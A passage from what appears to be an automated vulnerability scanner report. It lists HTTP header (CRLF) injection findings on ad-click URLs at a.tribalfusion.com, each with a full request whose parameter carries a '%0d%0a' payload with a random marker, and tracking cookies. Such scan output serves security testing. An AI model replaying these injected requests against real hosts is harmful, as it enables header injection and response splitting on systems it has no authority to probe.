GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/1dd10%0d%0ab9b49b742a6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the adID request parameter is copied into the Location response header. The payload 86472%0d%0a3ac15fbfbe3 was submitted in the adID parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=86472%0d%0a3ac15fbfbe3&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the cs:a:e request parameter is copied into the Location response header. The payload 32241%0d%0ab96b6c5512a was submitted in the cs:a:e parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=32241%0d%0ab96b6c5512a HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the cs:e request parameter is copied into the Location response header. The payload 66fce%0d%0aea3a706a45f was submitted in the cs:e parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=66fce%0d%0aea3a706a45f&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the cs:pro request parameter is copied into the Location response header. The payload c30a3%0d%0a6e4c5584b26 was submitted in the cs:pro parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=c30a3%0d%0a6e4c5584b26&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migAgencyId request parameter is copied into the Location response header. The payload e521c%0d%0aa2e49ee6de7 was submitted in the migAgencyId parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=e521c%0d%0aa2e49ee6de7&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migRandom request parameter is copied into the Location response header. The payload 15bea%0d%0a72b9d1a767d was submitted in the migRandom parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=15bea%0d%0a72b9d1a767d&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migSource request parameter is copied into the Location response header. The payload 31b5f%0d%0a1d727e3388a was submitted in the migSource parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=31b5f%0d%0a1d727e3388a&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migTrackDataExt request parameter is copied into the Location response header. The payload ee931%0d%0acbd419af417 was submitted in the migTrackDataExt parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=ee931%0d%0acbd419af417&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migTrackFmtExt request parameter is copied into the Location response header. The payload 7de0b%0d%0af87942a728d was submitted in the migTrackFmtExt parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=7de0b%0d%0af87942a728d&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the migUnencodedDest request parameter is copied into the Location response header. The payload 4189b%0d%0a7791b4f74c2 was submitted in the migUnencodedDest parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=4189b%0d%0a7791b4f74c2&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.79. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 1349f%0d%0a72cb2b1477e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?1349f%0d%0a72cb2b1477e=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.80. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 124dd%0d%0a93ae5762393 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/?124dd%0d%0a93ae5762393=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the ord request parameter is copied into the Location response header. The payload 7ac8c%0d%0a46bc1d03be4 was submitted in the ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=7ac8c%0d%0a46bc1d03be4 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the ;ord request parameter is copied into the Location response header. The payload d1d25%0d%0aa6bf3daf369 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.
Request
